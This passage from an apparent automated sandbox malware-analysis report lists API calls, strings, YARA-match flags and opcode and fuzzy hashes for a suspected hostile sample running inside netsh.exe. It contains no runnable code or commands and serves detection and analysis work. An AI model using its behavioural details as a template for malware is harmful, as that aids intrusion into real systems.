              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: fb0ec110ce3797c1a4c922a0002a52fefeeee01efe517bca13f7ee07c89eead5
              • Instruction ID: e42871014d93576d6c2ce4f0b95aca71a5ccaf7568ab3cc15d4e7fd181286b88
              • Opcode Fuzzy Hash: fb0ec110ce3797c1a4c922a0002a52fefeeee01efe517bca13f7ee07c89eead5
              • Instruction Fuzzy Hash: FC90027170140402D30075D85408646000587E1301F55D022A9024665ECA6589917131
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4b4ea7ddacc6f00b774e3f8ece7590fe93c097cba817312a6e2fb110543dc0f0
              • Instruction ID: 31fa624e013c9f692e59b63f237f74249370a5cd01f3908e7ae8c2410f2fe37f
              • Opcode Fuzzy Hash: 4b4ea7ddacc6f00b774e3f8ece7590fe93c097cba817312a6e2fb110543dc0f0
              • Instruction Fuzzy Hash: EE90027170148802D3107198840474A000587D1301F59C422A8424768D8A9589917131
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: cba2b906c13d3f62dc91a2306c252adbc58f32c6b38c10c5952bd08dd560cd32
              • Instruction ID: e752fa3d85784412e01bb0f8b9bc52cc0da7f4bf89a1ef2e5c94efdb2e438a1f
              • Opcode Fuzzy Hash: cba2b906c13d3f62dc91a2306c252adbc58f32c6b38c10c5952bd08dd560cd32
              • Instruction Fuzzy Hash: 0990027170140842D30071984404B46000587E1301F55C027A4124764D8A15C9517531
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: bc78dc8d327685947d4d04467d9f9a239eac012a421f315c7ddaf67464b4ba22
              • Instruction ID: 08e08f821b6f2b1864c3e873fc5f5999e69fe0be0e14cdd45ecdcb335525713d
              • Opcode Fuzzy Hash: bc78dc8d327685947d4d04467d9f9a239eac012a421f315c7ddaf67464b4ba22
              • Instruction Fuzzy Hash: 5F900261742441525745B1984404507400697E1341795C023A5414A60C89269956E631
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 177b11e0f5006f27c855d3f6b1558fce49e463eadc91e790ba18d62ca4f92dc7
              • Instruction ID: 825959cccd5274cfb6af818e61d8358855080d8fce91166e9752c04243dcad26
              • Opcode Fuzzy Hash: 177b11e0f5006f27c855d3f6b1558fce49e463eadc91e790ba18d62ca4f92dc7
              • Instruction Fuzzy Hash: FA90027170140413D31171984504707000987D1341F95C423A4424668D9A568A52B131
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 60998fbc5393dbd916cdf87092e21f1d5cdebfee08534655691a15f6087a148b
              • Instruction ID: c4b19e0eaa566d3e61e15d1cd33d54cb78eb7bc83326dd5328ea409250adbaec
              • Opcode Fuzzy Hash: 60998fbc5393dbd916cdf87092e21f1d5cdebfee08534655691a15f6087a148b
              • Instruction Fuzzy Hash: 1790026971340002D3807198540860A000587D2302F95D426A4015668CCD1589696331
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 6b9a33a34bb259a4352ceb16e86499076936345f7705d187593647345bfec722
              • Instruction ID: 276aba18b2c666303e40c595e0d4e2f76152d00e52844d75603203aa0e0d4774
              • Opcode Fuzzy Hash: 6b9a33a34bb259a4352ceb16e86499076936345f7705d187593647345bfec722
              • Instruction Fuzzy Hash: C79002B170140402D34071984404746000587D1301F55C022A9064664E8A598ED57675
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2af0223d28b3e081c32cf8addde6267cbbdf41a65dde2d3c16f87db237b9873c
              • Instruction ID: 0f93a5ddad8f26645f337c3a5815dbba8e039ef0f949ef7a8bc3504b80b46ba0
              • Opcode Fuzzy Hash: 2af0223d28b3e081c32cf8addde6267cbbdf41a65dde2d3c16f87db237b9873c
              • Instruction Fuzzy Hash: AA900261711C0042D30075A84C14B07000587D1303F55C126A4154664CCD1589616531
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c49aee22b93945c38e7094ede9edf338f5f4dc23113b87e506f6ab70b93b3daa
              • Instruction ID: ffa8fe6011805b7ebe9f84b2995d18e1abb48601f8f276f47d9b1a7b0c49aaaa
              • Opcode Fuzzy Hash: c49aee22b93945c38e7094ede9edf338f5f4dc23113b87e506f6ab70b93b3daa
              • Instruction Fuzzy Hash: E19002A174140442D30071984414B060005C7E2301F55C026E5064664D8A19CD527136
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e18e332b627b15ac1e506c48e5e790c3a3b0c2b8d27a2ba294e9738887b3fbf3
              • Instruction ID: 5afa92d809626c0f0b74d020495e1f002006a7ef3c898c9131f1bdd2b42b7a95
              • Opcode Fuzzy Hash: e18e332b627b15ac1e506c48e5e790c3a3b0c2b8d27a2ba294e9738887b3fbf3
              • Instruction Fuzzy Hash: 09900271B0550402D30071984514706100587D1301F65C422A4424678D8B958A5175B2

              Control-flow Graph (image not reproduced; basic blocks 419080-4191a2, a loop around Sleep that calls 41bd40, 41be10, 40acf0, 414e50, 418ca0 and 418eb0)
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 00419128
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
              • Instruction ID: 2511d3cdde594a459876a10949f18b9dbd63c8e6bbb0d03ebfda35d58ccafa52
              • Opcode Fuzzy Hash: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
              • Instruction Fuzzy Hash: 243192B2500345BBD724DF65C885FA7B7B9FB48B04F10811EF62E5B245D634B990CBA8

              Control-flow Graph

              control_flow_graph 609 4191a4-4191ac 610 41916f-419184 call 418eb0 609->610 611 4191ae-4191d8 call 414e50 609->611 614 419189-41918c 610->614 617 4191f7-4191fc 611->617 618 4191da-4191f6 call 41f1f2 CreateThread 611->618 616 419196-41919a 614->616 619 419120-419131 Sleep 616->619 620 41919c-4191a2 616->620 619->616 623 419133-419139 619->623 624 419163-419169 623->624 625 41913b-419161 call 418ca0 623->625 624->610 625->614
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID: net.dll
              • API String ID: 2422867632-2431746569
              • Opcode ID: ad5e7f28f32926ce923828140b5cfa8639c3460879cf9296b84e7864fb638656
              • Instruction ID: 7300f322227102f16bcd6e2f7069b684d6053782363c66e42f5ed88aedb1cee5
              • Opcode Fuzzy Hash: ad5e7f28f32926ce923828140b5cfa8639c3460879cf9296b84e7864fb638656
              • Instruction Fuzzy Hash: 4901FC776002047AD7349A79DC46FE7B3A8DB80B15F14011EF91EA7280DA79B98487E9

              Control-flow Graph

              control_flow_graph 640 41a663-41a687 call 41af60 642 41a68c-41a6a1 RtlFreeHeap 640->642
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: bcc30635236e8fa720a28b406ee799dbec335dff77b832bd978397278855787d
              • Instruction ID: 24307b1b16fdc674b1b2a46e27d06997c9a9b4145e39e254628283c940cb61d2
              • Opcode Fuzzy Hash: bcc30635236e8fa720a28b406ee799dbec335dff77b832bd978397278855787d
              • Instruction Fuzzy Hash: 37E065B51142146FD724DF68CC48E9B776CDF48A54F118659B95857291C530E91087A0
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
              APIs
              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00000000,?), ref: 0041A65D
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: 6EA
              • API String ID: 1279760036-1400015478
              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 7e75bf849664dcd21a59adfd75ead6ad56d5676ebc833959a6e845d45839b9aa
              • Instruction ID: 5992b9be4baf2c7b566ef3647458cd36ce21ba925a148f2579bd006564dde71f
              • Opcode Fuzzy Hash: 7e75bf849664dcd21a59adfd75ead6ad56d5676ebc833959a6e845d45839b9aa
              • Instruction Fuzzy Hash: 9601D871A9032877E721A6959C43FFE7B6C9B44F94F04011DFF04BA1C2EAE8690543EA
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 89ef2758859c2e10bc0e5734033b475c64cd629f5ad8a823021e51abe1df765a
              • Instruction ID: 08ee09190344bf92f8f3f610aae4f3648aa43aed276248cc1f80d003229f7369
              • Opcode Fuzzy Hash: 89ef2758859c2e10bc0e5734033b475c64cd629f5ad8a823021e51abe1df765a
              • Instruction Fuzzy Hash: 32E092773803143AE3306599AC03FE7B39CDB81B24F14002AFA0DEB2C1D999F84542A8
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 12bca789234c5c8e009ebb5de871be4c352e22ecce6a122e4c61cd4aa664f28b
              • Instruction ID: af75529915aef102090087d8ecb2994e73b38dbc4dd88fb73fd8a3c03c61f894
              • Opcode Fuzzy Hash: 12bca789234c5c8e009ebb5de871be4c352e22ecce6a122e4c61cd4aa664f28b
              • Instruction Fuzzy Hash: 28E06DB12002086FCB24DF65CC85EDB3769EF49350F118158F90D97241CA35E8118BB0
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 882eee7629ece8699dc18cc87715d42552190a95e794bad672922a76abbf6966
              • Instruction ID: 9926e89926c1833471749db3aad87792544e539113a25e0d4aa8347d48243819
              • Opcode Fuzzy Hash: 882eee7629ece8699dc18cc87715d42552190a95e794bad672922a76abbf6966
              • Instruction Fuzzy Hash: D6D0C9B66545046B9714DA9DAC81CE773ACEBD8A20710C71BF96C8B140893495528BB1
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 2708cc23a197495d08e4d6a41a27bf5a19914847986057d4c8381ebeb1bbe9fb
              • Instruction ID: 39ff73362f3c324b3fb3a669c3a213d1a7861d9c5117aa6ee258ed075576ecec
              • Opcode Fuzzy Hash: 2708cc23a197495d08e4d6a41a27bf5a19914847986057d4c8381ebeb1bbe9fb
              • Instruction Fuzzy Hash: 4AD05E756903042BEA20BAE59C03F6A32896B84B14F094475F948EB3C3E9A5E50586A5
              APIs
              • SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
              • Instruction ID: 16dd6e19701eb8137eea147804aeefc1d225e4ea9fc13a12949d67fdd6a7e390
              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
              • Instruction Fuzzy Hash: 71D05E756503082AE610AAA59C03F6632886B44B04F490074F948AA3C3D964E4014169
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a40027de4ef781911760e8ae3da504be8b82ab5d89f01a2e4708737ae6bf0dd4
              • Instruction ID: 501a512253bcc6fbf76193987e8ac099f8401599ba2222a771c05aeb091d3106
              • Opcode Fuzzy Hash: a40027de4ef781911760e8ae3da504be8b82ab5d89f01a2e4708737ae6bf0dd4
              • Instruction Fuzzy Hash: 5BB09B71D015C5D5DF11E760460971B790067D1701F19C072D2030751F4738D5D1F175
              APIs
              • CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006,?,?,?), ref: 01568D7D
              • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(01561C9C,00000000,00000001,01561CAC,?), ref: 01568DAA
              • SysAllocString.OLEAUT32(?), ref: 01568DED
              • SysAllocString.OLEAUT32(?), ref: 01568E37
              • SysAllocString.OLEAUT32(?), ref: 01568E4B
              • SysAllocString.OLEAUT32(00000000), ref: 01568E54
              • SysAllocString.OLEAUT32(?), ref: 01568E77
              • SysFreeString.OLEAUT32(00000000), ref: 01568E92
              • SysFreeString.OLEAUT32(00000000), ref: 01568E99
              • SysFreeString.OLEAUT32(?), ref: 01568EA3
              • SysFreeString.OLEAUT32(?), ref: 01568EAD
              • SysFreeString.OLEAUT32(?), ref: 01568EB7
              • SysAllocString.OLEAUT32(WQL), ref: 01568F18
              • SysAllocString.OLEAUT32(select * from Win32_OperatingSystem), ref: 01568F29
              • VariantChangeType.OLEAUT32(?,?,00000000,00000017), ref: 01568FF1
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 01569044
              • VariantChangeType.OLEAUT32(?,?,00000000,00000017), ref: 015690A8
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 015690FB
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 0156915B
              • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 015691B6
              • SysFreeString.OLEAUT32(?), ref: 01569211
              • SysFreeString.OLEAUT32(?), ref: 0156921B
              • SysFreeString.OLEAUT32(?), ref: 01569239
              • SysFreeString.OLEAUT32(00000000), ref: 01569240
              • SysFreeString.OLEAUT32(?), ref: 0156924A
              • SysFreeString.OLEAUT32(?), ref: 01569254
              • SysFreeString.OLEAUT32(?), ref: 0156925E
              • CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0 ref: 01569264
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: String$Free$Alloc$ChangeTypeVariant$CreateInitializeInstanceUninitialize
              • String ID: BuildNumber$OSProductSuite$OSType$ServicePackMajorVersion$ServicePackMinorVersion$Version$WQL$\\%s\root\cimv2$select * from Win32_OperatingSystem
              • API String ID: 3160123450-4179124359
              • Opcode ID: b4825d7b8a65ffa3d403a7fd9109aad673e32866d5c9d693966f8c0315df74fa
              • Instruction ID: eed71102687b058dded10d9b18a548389ad72a621ba98f1e97045d835cf41c9f
              • Opcode Fuzzy Hash: b4825d7b8a65ffa3d403a7fd9109aad673e32866d5c9d693966f8c0315df74fa
              • Instruction Fuzzy Hash: 03F19F76114701AFD7219F64D849B6FBBB9FBC8724F11091CFA659B250EB30E808DBA1
              APIs
              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000500,?,00000000,00000000,000000B6,00000000,?,00000000,?,?,01567F23,?,0156471D,000000B6,?), ref: 01567E14
              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,01567F23,?,0156471D,000000B6,?), ref: 01567E20
              • wprintf.MSVCRT ref: 01567E2C
